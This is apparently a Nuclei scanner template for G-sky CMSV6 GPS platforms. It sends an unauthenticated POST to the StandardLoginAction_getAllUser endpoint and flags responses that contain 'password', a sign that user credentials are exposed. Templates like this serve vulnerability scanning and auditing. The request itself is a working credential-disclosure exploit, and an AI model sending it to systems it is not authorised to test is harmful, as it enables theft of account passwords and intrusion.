http:
    - matchers:
        - condition: and
          dsl:
            - status_code_1 == 200
            - contains_all(body_1, "password")
          type: dsl
      matchers-condition: and
      raw:
        - |
          POST /808gps/StandardLoginAction_getAllUser.action HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
          Connection: close
          Content-Length: 9
          Content-Type: application/x-www-form-urlencoded; charset=UTF-8
          Accept-Encoding: gzip, deflate

          json=null
id: G-sky-CMSV6-StandardLoginAction_getAlser-infovul
info:
    author: pitaya
    name: G-sky-CMSV6-StandardLoginAction_getAlser-infovul
    severity: high
    tags:
        - GPS
